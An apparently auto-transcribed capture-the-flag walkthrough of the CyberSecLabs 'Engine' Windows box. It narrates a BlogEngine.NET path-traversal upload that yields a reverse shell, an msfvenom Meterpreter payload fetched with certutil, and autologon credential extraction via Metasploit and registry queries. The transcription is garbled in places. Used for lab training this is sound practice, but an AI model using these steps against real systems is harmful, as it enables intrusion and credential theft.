Welcome back to a new video. In this video, we're going to be going over another machine from Cyberseclabs. The machine is Engine and the operating system is Windows. This is a test box of this video. In this test box, we're going to be doing some web application enumeration. We found that there is an exploit for the web application. We uploaded our exploit after some modifications on the exploit, and we got a reversal back to us. Then we moved on to the privilege escalation, where we found clear text credentials in the registry key called auto logon. So auto log on stores the credentials, can be configured to store clear text credentials, right? So that's the privilege escalation factor of this video. Let's hop in. So here we have the InApp Scan, and InApp Scan is telling me that we got port 80, HTTP, and we have got also some SMB running. So we might be interested in finding more info about the SMB details, SMB shares. So if we go, as you can see, the operating system is Windows since we have NetBIOS. If you go down, we can see that the script execution of InApp has failed to determine the OS. As you can see, we haven't found the exact version of the Windows operating system running on this box. So per this challenge, we have port 80, and we have the ports pertaining to SMB. So one way to start our penetration testing is either we start with port 80 or we start with SMB. We can't start with RDP since we don't have predetermined credentials to start with, and it is a waste of time to brute force random usernames and passwords, given the fact that your time is limited in the real case scenario, and the other fact is you have other ports to enumerate. So when these fail, you jump into RDP as a last resort. Okay. So let's start with SMB, right? So let's split the terminal. Or let me clear that. We don't need that anymore. So clear. Okay. SMB Client -L .I, sorry, 172 31 1.16 زي مش اشطر من شو بنسى الكوماندات، بنسى مو طبيعي. All right, so let's start with SMB Client. SMB Client -I, target IP 172, 16, 116, if I'm right, -L, and here we need to assume the username, right? So let's put something like administrator and -N-U. Access denied. So we need another user. Let's try something with admin. User. All right. So the SMB here, the SMB protocol has been deployed to challenge us for some form of authentication. So random usernames won't work. That's why we need to move on, since SMB Client now, or SMB Server on this Windows box is deemed to be like RDP. There is no point to continue further enumeration of that service. Why? Because we're going to have predetermined username as passwords. So let's hop to HTTP. So we fire up our browser, and 162, 31, 116. Oh, 1. All right. Here is 21. There you go. So as you can see, we have the default page of IIS server, Internet Information Server. So this is the default page of the web server on this box. So we don't have anything further. But as you know, when we have no clue about the directories of the web server, like this page, we need to get the help of our friend, Directory Buster or Go Buster. Now, as you know, Directory Buster takes some time to give you the results. That's why I'm going to point to the word list that will work with this challenge. So if we go to the other terminal, and from here we launch Dear Directory Buster. Browse. We go to user, share, all the way to word lists, Directory Buster. Nope, not this one. And you select common, right? Okay, so once you select common and you put the IP address, you will end up with the directory or the path that will work on this web server. So I'm going to close that since I have run this before. I'm going to go back. You type log. So the block has opened, and as you can see, we have some dummy block with some random content on the right. So here, if you go down, you can see the block or the application running the block called blogengine.net. That is the web application name, and it is vastly important to determine the name and the version. So we have copyright 2020, powered by blogengine.net. And do we have further information about the version? What is that one? Archive, contact. Let's click on contact. Okay. All right. So we don't have a version, right? So if you don't have a version, so we need to try. But in the real world, in a real case or in a scenario, you definitely find the version of the application. Why? Because in a production system, if you try an exploit that doesn't match the version of the application you're trying to test, it's going to cause some production problems. Desktop, Kali. Okay, clear, search, exploit, blog, engine. Let's go back, find blogengine.net. Okay. So dash w, displaying the URLs, blog engine. Search, exploit. So we have a couple of exploits that match the name blog engine, and we can see here we need to pick up the appropriate exploit for our purposes. So we have XML, not interested, not interested, not interested. Okay, so I have this. So directory traversal, remote code execution. So let's open the link and find out more about that exploit. So directory traversal, remote code execution. Okay, so more about the exploit. The first thing we read is about the exploit. Understand how it works. Path traversal vulnerability leading to remote code execution. This vulnerability affects blog engine versions and below. This is caused by unchecked theme parameter that is used to override the default theme. For rendering blog pages, the vulnerable code can be seen in this file. custom controls, post list. First, we set the TCP client address. All right, so here it says that we need to edit some stuff in the exploit, including our IP and the port number. So when the exploit runs on the target can connect back to the right address. And then we navigate. As you can see, we upload the exploit here on this address. After the successful upload of the exploit, we need to navigate to the URL that matches this formula. So this is here where we execute the directory traversal. After we execute the directory traversal, and given the fact that our listener is running, we should be able to get the exploit. We should be able to get the remote host connect back to us. So here this is the place where we need to modify. Okay, so where do we start? So I guess the exploit starts. Oh, this is very confusing. Okay, so it starts from here all the way down. We scroll down. Oh, let's do that again. All right. One. Okay, this one. Let's copy that, and let's now sudo nano. Let's name it log engine exploit dots. We need to find the right extension for that exploit. Let's go back. So it is ASCX. So ASCX, and we paste. Oh, paste. Oh yeah, we changed the content of the clipboard. So we need to copy that again. Start from here, scroll down. This is really I'm not gonna spell the word. YouTube is sensitive for some words here. So let's, oh my God. I don't want to download it. I just want to copy from here. So no one tell me, yeah, download exploit. Make yourself smart. Okay. So here we paste. Okay. So on here we change if config 16. So right here we change to 10.10 0.16, and here let's leave the port as is, and we leave. And now split. So here we type nc-ltp 4445. We're not done yet, so we need to upload that to the web application. So we go back. All right, let's upload now. See where we can upload. Home, archive, posts. So we need to post something. We need to look for the interface. Log in. Let's log in now. Oh, we have a login box here. Let's click on login. And we have username and password. All right. So given the fact that we don't have such enumeration details are given about that, so we can assume that default credentials need to work on that. So admin. All right, so we go to content, posts, and we type on new. In the new, we got something about upload. Let's find. Okay, here this one. File manager, upload, home, So this is the exploit. I upload the exploit here. Okay, and I guess we are done. Let's go back and go to the exact URL. So we grab this, and in here we like that. So blog. Let's find out. Let's go back. We haven't received not anything. So here we go to, let's go back. Posts. New. We're gonna upload again. So we have this one. Okay. So in here, we're gonna copy the URL and go back all the way till admin. We replace, don't replace with a block. Enter. So I guess we haven't received any connection. Alright, so after we have downloaded the exploit, we need to rename that exploit into a new name. So basically we type sudo move the downloaded exploit, which is AS here, and we name it post view. I didn't pay attention to that naming requirements, but now we need to rename it to post view ASCX. Let's now go back, and here we remove this one, upload, we choose the new one named post view, and then we're going to go back, grab the directory traversal URL, paste. Let's see now if we receive the reverse shell. Alright, so we received the reverse shell back to our box. So we close that, we collapse that, and we see we need to wait for the prompt. Enter. Okay. So let's see now who we are on the system. That's the first step to enumerate or to escalate our privileges. But actually, I don't prefer these kind of shells. You see, it's not stable, so it's better to create our own payload and connect back to a meta-operator session. So here we do split, and this one we're gonna create payload sudo msf venom -p windows meta-operator reverse TCP lhost equal 172, right? Yeah, 31.1.16 lport. It's gonna be 4546. I hope I don't forget this. Okay, -f executable file, and here we name it to something like blog.exe. Password. Okay. Lport is wrong here. So lport equal to, and In our shell, let's navigate to a more safe directory for the execution of our upcoming payload. So C Windows, let's grab this, copy selection, CD, and this one, users, directory. Oh, I couldn't, right? I don't think I have CD to that directory. CD CD Windows, or CDC. All right, CD now users, directory, CD Alex, directory, and here we download our exploit. Oh, CD, I didn't CD to Alex, I guess. Alex, yeah, directory. All right. Okay. So here, let's fire up Python 3-m http.server. Okay, let's download the payload now. Insert util-url cache -f http 10.1 0 16 8000 blog.exe blog.exe. All right, so we have downloaded our payload. Let's launch Meterpreter now. I don't need this window here, so I'm going to collapse this and create one on the right, vertical. So MSF console. Okay, so here we're going to do the following. So use exploit multi-handler set payload Windows Meterpreter reverse TCP set lhost 10 10 0 16 if I'm right. Yeah, I'm right. Set L port 45. You see, I forgot the port. The port was 4546. I hope this is correct. Or we're gonna need to recreate the payload. Let's see that in our bash history here. Horizontal. Okay. So here, let's do ls.la. So where's the bash history file? It is here. All right. Nano bash history. All right. Let's find out. There are many MSF Venoms here, so it's not appropriate or it is not a feasible solution to use grep or cut, or I think I'm gonna end up with an infinite scroll here. Let's hope we arrive to the right command. Frag route, that was 1 week ago. Frag scabby. All right, we're wasting our time here. Let's collapse this and try again. Okay, so here 4546, and here set exit on session false. False. And here we run. All right, so let's run the payload now. cmd/c log.exe. Okay. cmd/c log.exe. So it is right here. I can't seem to execute it. So the mistake here, we made some mistake in the L host. It is 10. We put the remote host instead of our local host. That's why it didn't work. 016. All right. So now let's sudo move log 2. And in here, we're going to download the tool again, search utility, log 2, 2. And above there, we're going to Python 3-m http.server. Okay. Now cmd/c log2.exe. log2.exe. And it seems to be there is no luck here to receive the shell, the metaprotect session. Four, 5, 4, 6 block. Okay, block 3. Filehouse 10, 10, 0, 16. L port 4, 5, 4, 6. All right. Okay. And here we're going to download block 3. All right, so we received the metaprotect special here, and comfortably we can now navigate the file system and discover much details about that. So we type sysinfo. The system is Windows 2012 R2 Windows Server. All right, so for this challenge, the privilege escalation vector of this challenge is the auto log on feature is enabled on the system, right? So when you enable auto log on the system, Windows can log on itself. And the problem is when the credentials are stored in clear text. So we can retrieve these credentials via the registry, but couldn't find that. So as you can see, I typed the command here to retrieve the default username or to retrieve the password, but I haven't got any results. So I know that in Metasploit there is a module to retrieve this information. So we go to background, ground, search, name, auto, log. So here we have Windows gather credentials, Windows auto log on. So we use that, right, to retrieve these credentials. So use show options session. So here we see how many sessions we have. Sessions -L. We have two. Most likely it is the first one. So set session 1, run. The host engine is not configured to have auto log on password. Okay, let's try 2, run. So it didn't work against the, the VPN is restarting, I can see here, right above me. Sadly, machines restart on their own in Cyberseclabs. And my password now decided not to work. All right, so here let's test the connection directory. So I see that I have lost the connection, right? Very frustrating. Let me now take this again. Sudo all the time. Stop this one again. All right, so here we got some stuff messed up here. So sessions L L1 jobs. Okay. So let's cd again. cd users, cd Alex. All right. Previous. Show options. Run. Okay. So here we got the let's go background. And again, we're gonna use the module set session. It's gonna be 3, run. So after we found the username and password, the administrator username and password, using the post-exploitation of module, gathering login credentials. So here we're gonna log in now using evil WinRM to gain PowerShell session on the machine, hopefully with the administrator username. So evil WinRM-I 172 31 1.16. Username is administrator, and the found password is, can I paste it? Now let's log in. So we received some error. Don't know what kind of error is this. An error of type WinRM. Let's go to desktop. cd evil WinRM. So I might need to launch this from this directory. So evil ruby evil winrm .rb-i 172.31.1.16-u administrator-p and the password. Oh, what was that? Typos. Evil WinRM. I hope this works. But that's the last stage of your privilege escalation. You don't need to do anything other than that. If the credentials worked, then we're lucky. If it didn't work, you may try it on your own and give me your feedback. But that is the path of this lab machine. Of course, there are multiple ways to gather the credentials. You can use many ways. I used the Metasploit, and you can use other ways as well. So here I got some error. Authorization error. So it seems like the credentials didn't work for some reason. Let's go find out if the machine is working. So we go down, engine, okay, it still works. But this is very weird. All right. So it's saying that the credentials is not working and everything in our, so the IP is correct. All right. So I have typo here. So administrator. So I have typo in the administrator username. I hope this corrects the problem. Again, we have authorization error. Let me review the details. Administrator. So there is no typo right now. But the weird thing is, I don't know why this didn't work. All right, so I'm going to leave this to you guys. You may try these credentials or try the machine on your own and find out if this password works for you. In my case, it works for one time before I do the video. And right now I'm doing the video and it didn't work for some reason that I can't assimilate in my mind. Since some machines in Cyberseclabs, they have some magic, you know. Some files get raised, some files get returned, something you know, which work, right? Which work. So here the engine, this is the machine, right? So if you experience the same, it might be some issue with the machine. Actually, this is the first time I encountered this. All right. Okay then. Anyways, this is the procedure, and as you saw, guys, it is exploiting Windows. It's all a matter of finding some primitive flaws, right? Sometimes you find clear text passwords. Sometimes you find XML that contains the clear text password. Sometimes you find misconfigured service. Windows is all about enumeration, right? So what else? So basically, we can find another way actually. So if we go back here, so this one, if we drop to shell, if you type previous, we can actually query the registry keys, right? So let's drop to shell. Or let's go to sessions. Sessions dash I1. All right. So in here, I'm going to drop to shell. That is great. Okay. So basically, if we want to inquire about the credentials from the registry, we're going to have to follow this path. So basically, the auto log on credentials are stored in this registry key, right? So if we try to enumerate and extract the values right directly from the registry key, the values are the default username and the default password. So let's grab these software. Let's go back, and here we type reg query the key, and then we type the sub key that we want to enumerate or find the extract the values. So default username. Let's paste it. Hopefully there is something will return to us. Reg query is invalid. Invalid key name. Okay. Oh, look, we forgot to put this. So basically, what we're gonna do here, we're gonna look. We're gonna take that. We're gonna go back. Gonna type reg query HKLM. That's what we forgot actually. And paste, of course, the backslash. Oh no. Okay, no. All right, so here reg query HKLM, paste backslash, and here we're gonna take that as v, go back to the Microsoft page, take the default username, invalid syntax. So here, invalid syntax, reg query. I have no idea what's wrong here. So reg query KLM software, Microsoft Windows /v. Oh, I don't know what's wrong. Our cases. All right. So let's copy that. And let's type, let's do that. Reg query, and here, local machine. Maybe that works. So we got the same problem. Let's find more about this. Okay, that's what I'm doing. All right. Reg query. Let's try a different value. So take this. And here we try default password. Oh, okay. Let's exit the shell. All right then. So I don't know what's wrong with this lab actually, but try it on your own and give me your feedback if you found the login credentials or you find another way to do your privilege escalation. All right then.